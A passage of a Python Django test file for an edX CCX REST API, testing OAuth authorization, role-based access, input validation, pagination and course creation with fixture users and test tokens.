Creates auth tokens for the given user
"""
# create an oauth client app entry
app_client = Client.objects.create(
user=user,
name='test client',
url='http://localhost//',
redirect_uri='http://localhost//',
client_type=CONFIDENTIAL
)
# create an authorization code
app_grant = Grant.objects.create(
user=user,
client=app_client,
redirect_uri='http://localhost//'
)
# create an oauth2 provider client app entry
app_client_oauth2_provider = dot_models.Application.objects.create(
name='test client 2',
user=user,
client_type='confidential',
authorization_grant_type='authorization-code',
redirect_uris='http://localhost:8079/complete/edxorg/'
)
# create an authorization code
auth_oauth2_provider = dot_models.AccessToken.objects.create(
user=user,
application=app_client_oauth2_provider,
expires=now() + timedelta(weeks=1),
scope='read write',
token='16MGyP3OaQYHmpT1lK7Q6MMNAZsjwF'
)
auth_header_oauth2_provider = "Bearer {0}".format(auth_oauth2_provider)
auth = self.get_auth_token(app_grant, app_client)
return auth, auth_header_oauth2_provider
def expect_error(self, http_code, error_code_str, resp_obj):
"""
Helper function that checks that the response object
has a body with the provided error
"""
self.assertEqual(resp_obj.status_code, http_code)
self.assertIn('error_code', resp_obj.data)
self.assertEqual(resp_obj.data['error_code'], error_code_str)
def expect_error_fields(self, expected_field_errors, resp_obj):
"""
Helper function that checks that the response object
has a body with the provided field errors
"""
self.assertEqual(resp_obj.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('field_errors', resp_obj.data)
# restructure the error dictionary for an easier comparison
resp_dict_error = {}
for field_name, error_dict in resp_obj.data['field_errors'].iteritems():
resp_dict_error[field_name] = error_dict.get('error_code', '')
self.assertEqual(expected_field_errors, resp_dict_error)
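# Example (illustrative):
# self.expect_error_fields({'coach_email': 'missing_field_coach_email'}, resp)
# asserts a 400 response whose field_errors carry exactly that error code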
@attr(shard=1)
@ddt.ddt
class CcxListTest(CcxRestApiTest):
"""
Test for the CCX REST APIs
"""
ENABLED_SIGNALS = ['course_published']
@classmethod
def setUpClass(cls):
super(CcxListTest, cls).setUpClass()
def setUp(self):
"""
Set up tests
"""
super(CcxListTest, self).setUp()
self.list_url = reverse('ccx_api:v0:ccx:list')
self.list_url_master_course = urlparse.urljoin(
self.list_url,
'?master_course_id={0}'.format(urllib.quote_plus(self.master_course_key_str))
)
@ddt.data(*AUTH_ATTRS)
def test_authorization(self, auth_attr):
"""
Test that only the right token is authorized
"""
auth_list = [
"Wrong token-type-obviously",
"Bearer wrong token format",
"Bearer wrong-token",
"Bearer",
"Bearer hfbhfbfwq398248fnid939rh3489fh39nd4m34r9" # made up token
]
# all the auths in the list fail to authorize
for auth in auth_list:
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED)
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_authorization_no_oauth_staff(self):
"""
Check authorization for staff users logged in without oauth
"""
# create a staff user
staff_user = UserFactory(
username='test_staff_user',
email='[email protected]',
password=USER_PASSWORD
)
# add staff role to the staff user
CourseStaffRole(self.master_course_key).add_users(staff_user)
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
# the staff user can perform the request
self.client.login(username=staff_user.username, password=USER_PASSWORD)
resp = self.client.get(self.list_url_master_course)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.post(self.list_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
def test_authorization_no_oauth_instructor(self):
"""
Check authorization for instructor users logged in without oauth
"""
# create an instructor user
instructor_user = UserFactory(
username='test_instructor_user', email='[email protected]', password=USER_PASSWORD
)
# add instructor role to the instructor user
CourseInstructorRole(self.master_course_key).add_users(instructor_user)
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
# the instructor user can perform the request
self.client.login(username=instructor_user.username, password=USER_PASSWORD)
resp = self.client.get(self.list_url_master_course)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.post(self.list_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
def test_authorization_no_oauth(self):
"""
Check authorization for coach users logged in without oauth
"""
# create a coach user
coach_user = UserFactory(
username='test_coach_user', email='[email protected]', password=USER_PASSWORD
)
# add coach role to the coach user
CourseCcxCoachRole(self.master_course_key).add_users(coach_user)
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
# the coach user cannot perform the request: this type of user can only get her own CCX
self.client.login(username=coach_user.username, password=USER_PASSWORD)
resp = self.client.get(self.list_url_master_course)
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
resp = self.client.post(self.list_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
@ddt.data(*AUTH_ATTRS)
def test_get_list_wrong_master_course(self, auth_attr):
"""
Test for various get requests with wrong master course string
"""
# mock the permission class so these cases can be tested
mock_class_str = 'openedx.core.lib.api.permissions.IsMasterCourseStaffInstructor.has_permission'
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
# case with no master_course_id provided
resp = self.client.get(self.list_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', resp)
base_url = urlparse.urljoin(self.list_url, '?master_course_id=')
# case with empty master_course_id
resp = self.client.get(base_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', resp)
# case with invalid master_course_id
url = '{0}invalid_master_course_str'.format(base_url)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', resp)
# case with nonexistent master_course_id
url = '{0}course-v1%3Aorg_foo.0%2Bcourse_bar_0%2BRun_0'.format(base_url)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'course_id_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_get_list(self, auth_attr):
"""
Tests the API to get a list of CCX Courses
"""
# there are no CCX courses
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertIn('count', resp.data) # pylint: disable=no-member
self.assertEqual(resp.data['count'], 0) # pylint: disable=no-member
# create a few ccx courses
num_ccx = 10
for _ in xrange(num_ccx):
self.make_ccx()
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertIn('count', resp.data) # pylint: disable=no-member
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertIn('results', resp.data) # pylint: disable=no-member
self.assertEqual(len(resp.data['results']), num_ccx) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_get_sorted_list(self, auth_attr):
"""
Tests the API to get a sorted list of CCX Courses
"""
# create a few ccx courses
num_ccx = 3
for _ in xrange(num_ccx):
self.make_ccx()
# update the display_name fields
all_ccx = CustomCourseForEdX.objects.all()
all_ccx = all_ccx.order_by('id')
self.assertEqual(len(all_ccx), num_ccx)
title_str = 'Title CCX {0}'
for num, ccx in enumerate(all_ccx):
ccx.display_name = title_str.format(string.ascii_lowercase[-(num + 1)])
ccx.save()
# sort by display name
url = '{0}&order_by=display_name'.format(self.list_url_master_course)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(len(resp.data['results']), num_ccx) # pylint: disable=no-member
# the display_name should be sorted as "Title CCX x", "Title CCX y", "Title CCX z"
for num, ccx in enumerate(resp.data['results']): # pylint: disable=no-member
self.assertEqual(title_str.format(string.ascii_lowercase[-(num_ccx - num)]), ccx['display_name'])
# add sort order desc
url = '{0}&order_by=display_name&sort_order=desc'.format(self.list_url_master_course)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
# the only thing we can check is that the display names are in reverse
# alphabetical order, mirroring how the field was updated above (with ids ascending)
for num, ccx in enumerate(resp.data['results']): # pylint: disable=no-member
self.assertEqual(title_str.format(string.ascii_lowercase[-(num + 1)]), ccx['display_name'])
@ddt.data(*AUTH_ATTRS)
def test_get_paginated_list(self, auth_attr):
"""
Tests the API to get a paginated list of CCX Courses
"""
# create some ccx courses
num_ccx = 357
for _ in xrange(num_ccx):
self.make_ccx()
page_size = settings.REST_FRAMEWORK.get('PAGE_SIZE', 10)
num_pages = int(math.ceil(num_ccx / float(page_size)))
# get first page
resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['current_page'], 1) # pylint: disable=no-member
self.assertEqual(resp.data['start'], 0) # pylint: disable=no-member
self.assertIsNotNone(resp.data['next']) # pylint: disable=no-member
self.assertIsNone(resp.data['previous']) # pylint: disable=no-member
# get a page in the middle
url = '{0}&page=24'.format(self.list_url_master_course)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['current_page'], 24) # pylint: disable=no-member
self.assertEqual(resp.data['start'], (resp.data['current_page'] - 1) * page_size) # pylint: disable=no-member
self.assertIsNotNone(resp.data['next']) # pylint: disable=no-member
self.assertIsNotNone(resp.data['previous']) # pylint: disable=no-member
# get last page
url = '{0}&page={1}'.format(self.list_url_master_course, num_pages)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member
self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['current_page'], num_pages) # pylint: disable=no-member
self.assertEqual(resp.data['start'], (resp.data['current_page'] - 1) * page_size) # pylint: disable=no-member
self.assertIsNone(resp.data['next']) # pylint: disable=no-member
self.assertIsNotNone(resp.data['previous']) # pylint: disable=no-member
# last page + 1
url = '{0}&page={1}'.format(self.list_url_master_course, num_pages + 1)
resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
@ddt.data(
(
{},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth_header_oauth2_provider'
),
(
{},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth'
),
(
{'master_course_id': None},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth_header_oauth2_provider'
),
(
{'master_course_id': None},
status.HTTP_400_BAD_REQUEST,
'master_course_id_not_provided',
'auth'
),
(
{'master_course_id': ''},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth_header_oauth2_provider'
),
(
{'master_course_id': ''},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth'
),
(
{'master_course_id': 'invalid_master_course_str'},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth'
),
(
{'master_course_id': 'invalid_master_course_str'},
status.HTTP_400_BAD_REQUEST,
'course_id_not_valid',
'auth_header_oauth2_provider'
),
(
{'master_course_id': 'course-v1:org_foo.0+course_bar_0+Run_0'},
status.HTTP_404_NOT_FOUND,
'course_id_does_not_exist',
'auth'
),
(
{'master_course_id': 'course-v1:org_foo.0+course_bar_0+Run_0'},
status.HTTP_404_NOT_FOUND,
'course_id_does_not_exist',
'auth_header_oauth2_provider'
),
)
@ddt.unpack
def test_post_list_wrong_master_course(self, data, expected_http_error, expected_error_string, auth_attr):
"""
Test for various post requests with wrong master course string
"""
# mock the permission class so these cases can be tested
mock_class_str = 'openedx.core.lib.api.permissions.IsMasterCourseStaffInstructor.has_permission'
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
# check that the expected error is returned for the given input data
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(expected_http_error, expected_error_string, resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_wrong_master_course_special_cases(self, auth_attr):
"""
Same as test_post_list_wrong_master_course,
but with different ways of testing a wrong master_course_id
"""
# case with ccx not enabled for master_course_id
self.course.enable_ccx = False
self.mstore.update_item(self.course, self.coach.id)
data = {'master_course_id': self.master_course_key_str}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_403_FORBIDDEN, 'ccx_not_enabled_for_master_course', resp)
self.course.enable_ccx = True
self.mstore.update_item(self.course, self.coach.id)
# case with deprecated master_course_id
with mock.patch('courseware.courses.get_course_by_id', autospec=True) as mocked:
mocked.return_value.id.deprecated = True
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'deprecated_master_course_id', resp)
@ddt.data(
(
{},
{
'max_students_allowed': 'missing_field_max_students_allowed',
'display_name': 'missing_field_display_name',
'coach_email': 'missing_field_coach_email'
},
'auth'
),
(
{},
{
'max_students_allowed': 'missing_field_max_students_allowed',
'display_name': 'missing_field_display_name',
'coach_email': 'missing_field_coach_email'
},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title'
},
{
'coach_email': 'missing_field_coach_email'
},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title'
},
{
'coach_email': 'missing_field_coach_email'
},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
'auth'
),
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': 'this is not an [email protected]'
},
{'coach_email': 'invalid_coach_email'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': 'this is not an [email protected]'
},
{'coach_email': 'invalid_coach_email'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': '',
'coach_email': '[email protected]'
},
{'display_name': 'invalid_display_name'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': '',
'coach_email': '[email protected]'
},
{'display_name': 'invalid_display_name'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 'a',
'display_name': 'CCX Title',
'coach_email': '[email protected]'
},
{'max_students_allowed': 'invalid_max_students_allowed'},
'auth'
),
(
{
'max_students_allowed': 'a',
'display_name': 'CCX Title',
'coach_email': '[email protected]'
},
{'max_students_allowed': 'invalid_max_students_allowed'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': {'foo': 'bar'}
},
{'course_modules': 'invalid_course_module_list'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': {'foo': 'bar'}
},
{'course_modules': 'invalid_course_module_list'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'
},
{'course_modules': 'invalid_course_module_list'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'
},
{'course_modules': 'invalid_course_module_list'},
'auth_header_oauth2_provider'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': ['foo', 'bar']
},
{'course_modules': 'invalid_course_module_keys'},
'auth'
),
(
{
'max_students_allowed': 10,
'display_name': 'CCX Title',
'coach_email': '[email protected]',
'course_modules': ['foo', 'bar']
},
{'course_modules': 'invalid_course_module_keys'},
'auth_header_oauth2_provider'
),
)
@ddt.unpack
def test_post_list_wrong_input_data(self, data, expected_errors, auth_attr):
"""
Test for various post requests with wrong input data
"""
# add the master_course_key_str to the request data
data['master_course_id'] = self.master_course_key_str
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error_fields(expected_errors, resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_coach_does_not_exist(self, auth_attr):
"""
Specific test for the case when the input data is valid but the coach does not exist.
"""
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': '[email protected]'
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'coach_user_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_wrong_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but the
course modules do not belong to the master course
"""
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': self.coach.email,
'course_modules': [
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo',
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_bar'
]
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list_mixed_wrong_and_valid_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but some of
the course modules do not belong to the master course
"""
modules = self.master_course_chapters[0:1] + ['block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo']
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': self.coach.email,
'course_modules': modules
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_post_list(self, auth_attr):
"""
Test the creation of a CCX
"""
outbox = self.get_outbox()
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email,
'course_modules': self.master_course_chapters[0:1]
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# check if the response has at least the same data as the request
for key, val in data.iteritems():
self.assertEqual(resp.data.get(key), val) # pylint: disable=no-member
self.assertIn('ccx_course_id', resp.data) # pylint: disable=no-member
# check that the new CCX actually exists
course_key = CourseKey.from_string(resp.data.get('ccx_course_id')) # pylint: disable=no-member
ccx_course = CustomCourseForEdX.objects.get(pk=course_key.ccx)
self.assertEqual(
unicode(CCXLocator.from_course_locator(ccx_course.course.id, ccx_course.id)),
resp.data.get('ccx_course_id') # pylint: disable=no-member
)
# check that the coach user has coach role on the master course
coach_role_on_master_course = CourseCcxCoachRole(self.master_course_key)
self.assertTrue(coach_role_on_master_course.has_user(self.coach))
# check that the coach has been enrolled in the ccx
ccx_course_object = courses.get_course_by_id(course_key)
self.assertTrue(
CourseEnrollment.objects.filter(course_id=ccx_course_object.id, user=self.coach).exists()
)
# check that an email has been sent to the coach
self.assertEqual(len(outbox), 1)
self.assertIn(self.coach.email, outbox[0].recipients()) # pylint: disable=no-member
@ddt.data(
('auth', True),
('auth', False),
('auth_header_oauth2_provider', True),
('auth_header_oauth2_provider', False)
)
@ddt.unpack
def test_post_list_on_active_state(self, auth_attr, user_is_active):
"""
Test the creation of a CCX on user's active states.
"""
self.app_user.is_active = user_is_active
self.app_user.save() # pylint: disable=no-member
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email,
'course_modules': self.master_course_chapters[0:1]
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
if not user_is_active:
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
else:
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
@ddt.data(*AUTH_ATTRS)
def test_post_list_duplicated_modules(self, auth_attr):
"""
Test the creation of a CCX, but with duplicated modules
"""
chapters = self.master_course_chapters[0:1]
duplicated_chapters = chapters * 3
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email,
'course_modules': duplicated_chapters
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
self.assertEqual(resp.data.get('course_modules'), chapters) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_post_list_staff_master_course_in_ccx(self, auth_attr):
"""
Specific test to check that the staff and instructor of the master
course are assigned to the CCX.
"""
outbox = self.get_outbox()
data = {
'master_course_id': self.master_course_key_str,
'max_students_allowed': 111,
'display_name': 'CCX Test Title',
'coach_email': self.coach.email
}
resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# check that only one email has been sent and it is to the coach
self.assertEqual(len(outbox), 1)
self.assertIn(self.coach.email, outbox[0].recipients()) # pylint: disable=no-member
list_staff_master_course = list_with_level(self.course, 'staff')
list_instructor_master_course = list_with_level(self.course, 'instructor')
course_key = CourseKey.from_string(resp.data.get('ccx_course_id')) # pylint: disable=no-member
with ccx_course_cm(course_key) as course_ccx:
list_staff_ccx_course = list_with_level(course_ccx, 'staff')
list_instructor_ccx_course = list_with_level(course_ccx, 'instructor')
# The "Coach" in the parent course becomes "Staff" on the CCX, so the CCX should have 1 "Staff"
# user more than the parent course
self.assertEqual(len(list_staff_master_course) + 1, len(list_staff_ccx_course))
# Make sure all of the existing course staff are passed to the CCX
for course_user in list_staff_master_course:
self.assertIn(course_user, list_staff_ccx_course)
# Make sure the "Coach" on the parent course is "Staff" on the CCX
self.assertIn(self.coach, list_staff_ccx_course)
self.assertEqual(len(list_instructor_master_course), len(list_instructor_ccx_course))
for course_user, ccx_user in izip(sorted(list_instructor_master_course), sorted(list_instructor_ccx_course)):
self.assertEqual(course_user, ccx_user)
@attr(shard=1)
@ddt.ddt
class CcxDetailTest(CcxRestApiTest):
"""
Test for the CCX REST APIs
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
"""
Set up tests
"""
super(CcxDetailTest, self).setUp()
self.make_coach()
# create a ccx
self.ccx = self.make_ccx(max_students_allowed=123)
self.ccx_key = CCXLocator.from_course_locator(self.ccx.course.id, self.ccx.id)
self.ccx_key_str = unicode(self.ccx_key)
self.detail_url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': self.ccx_key_str})
def make_ccx(self, max_students_allowed=200):
"""
Overridden method to replicate (part of) the actual
creation of ccx courses
"""
ccx = super(CcxDetailTest, self).make_ccx(max_students_allowed=max_students_allowed)
ccx.structure_json = json.dumps(self.master_course_chapters)
ccx.save()
override_field_for_ccx(ccx, self.course, 'start', now())
override_field_for_ccx(ccx, self.course, 'due', None)
# Hide anything that can show up in the schedule
hidden = 'visible_to_staff_only'
for chapter in self.course.get_children():
override_field_for_ccx(ccx, chapter, hidden, True)
for sequential in chapter.get_children():
override_field_for_ccx(ccx, sequential, hidden, True)
for vertical in sequential.get_children():
override_field_for_ccx(ccx, vertical, hidden, True)
# enroll the coach in the CCX
ccx_course_key = CCXLocator.from_course_locator(self.course.id, ccx.id)
email_params = get_email_params(
self.course,
auto_enroll=True,
course_key=ccx_course_key,
display_name=ccx.display_name
)
enroll_email(
course_id=ccx_course_key,
student_email=self.coach.email,
auto_enroll=True,
email_students=False,
email_params=email_params,
)
return ccx
@ddt.data(*AUTH_ATTRS)
def test_authorization(self, auth_attr):
"""
Test that only the right token is authorized
"""
auth_list = [
"Wrong token-type-obviously",
"Bearer wrong token format",
"Bearer wrong-token",
"Bearer",
"Bearer hfbhfbfwq398248fnid939rh3489fh39nd4m34r9" # made up token
]
# all the auths in the list fail to authorize
for auth in auth_list:
resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=auth)
self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED)
resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_authorization_no_oauth_staff(self):
"""
Check authorization for staff users logged in without oauth
"""
# create a staff user
staff_user = User.objects.create_user('test_staff_user', '[email protected]', 'test')
# add staff role to the staff user
CourseStaffRole(self.master_course_key).add_users(staff_user)
data = {'display_name': 'CCX Title'}
# the staff user can perform the request
self.client.login(username=staff_user.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
def test_authorization_no_oauth_instructor(self):
"""
Check authorization for users logged in without oauth
"""
# create an instructor user
instructor_user = User.objects.create_user('test_instructor_user', '[email protected]', 'test')
# add instructor role to the instructor user
CourseInstructorRole(self.master_course_key).add_users(instructor_user)
data = {'display_name': 'CCX Title'}
# the instructor user can perform the request
self.client.login(username=instructor_user.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
def test_authorization_no_oauth_other_coach(self):
"""
Check authorization for other coach users logged in without oauth
"""
# create a coach user
coach_user = User.objects.create_user('test_coach_user', '[email protected]', 'test')
# add coach role to the coach user
CourseCcxCoachRole(self.master_course_key).add_users(coach_user)
data = {'display_name': 'CCX Title'}
# the coach user cannot perform the request: this type of user can only get her own CCX
self.client.login(username=coach_user.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
def test_authorization_no_oauth_ccx_coach(self):
"""
Check authorization for ccx coach users logged in without oauth
"""
data = {'display_name': 'CCX Title'}
# the coach who owns the CCX can perform the request only if it is a GET
self.client.login(username=self.coach.username, password=USER_PASSWORD)
resp = self.client.get(self.detail_url)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.client.patch(self.detail_url, data, format='json')
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
def test_resolve_get_detail(self):
"""
Test for the ccx detail view resolver. This is needed because it is assumed
that only a URL with a valid course id string can reach the detail view.
"""
# get the base url from the valid one to build invalid urls
base_url = '{0}/'.format(self.detail_url.rsplit('/', 1)[0])
# this url should be the same of the ccx list view
resolver = resolve(base_url)
self.assertEqual(views.CCXListView.__name__, resolver.func.__name__)
self.assertEqual(views.CCXListView.__module__, resolver.func.__module__)
# invalid urls
for invalid_ccx_id in ('foo', 'ccx-v1:org.0', 'ccx-v1:org.0+course_0'):
with self.assertRaises(Resolver404):
resolve('{0}{1}'.format(base_url, invalid_ccx_id))
# the following course ID works even though it is not a valid CCX course id (the regex matches course ID strings)
resolver = resolve('{0}{1}'.format(base_url, 'ccx-v1:org.0+course_0+Run_0'))
self.assertEqual(views.CCXDetailView.__name__, resolver.func.__name__)
self.assertEqual(views.CCXDetailView.__module__, resolver.func.__module__)
# and of course a valid ccx course id
resolver = resolve('{0}{1}'.format(base_url, self.ccx_key_str))
self.assertEqual(views.CCXDetailView.__name__, resolver.func.__name__)
self.assertEqual(views.CCXDetailView.__module__, resolver.func.__module__)
@ddt.data(
('get', AUTH_ATTRS[0]),
('get', AUTH_ATTRS[1]),
('delete', AUTH_ATTRS[0]),
('delete', AUTH_ATTRS[1]),
('patch', AUTH_ATTRS[0]),
('patch', AUTH_ATTRS[1])
)
@ddt.unpack
def test_detail_wrong_ccx(self, http_method, auth_attr):
"""
Test for different methods for detail of a ccx course.
All check the validity of the ccx course id
"""
client_request = getattr(self.client, http_method)
# get a detail url with a master_course id string
mock_class_str = 'openedx.core.lib.api.permissions.IsCourseStaffInstructor.has_object_permission'
url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': self.master_course_key_str})
# the permission class will give a 403 error because it will not find the CCX
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
# bypassing the permission class we get another kind of error
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
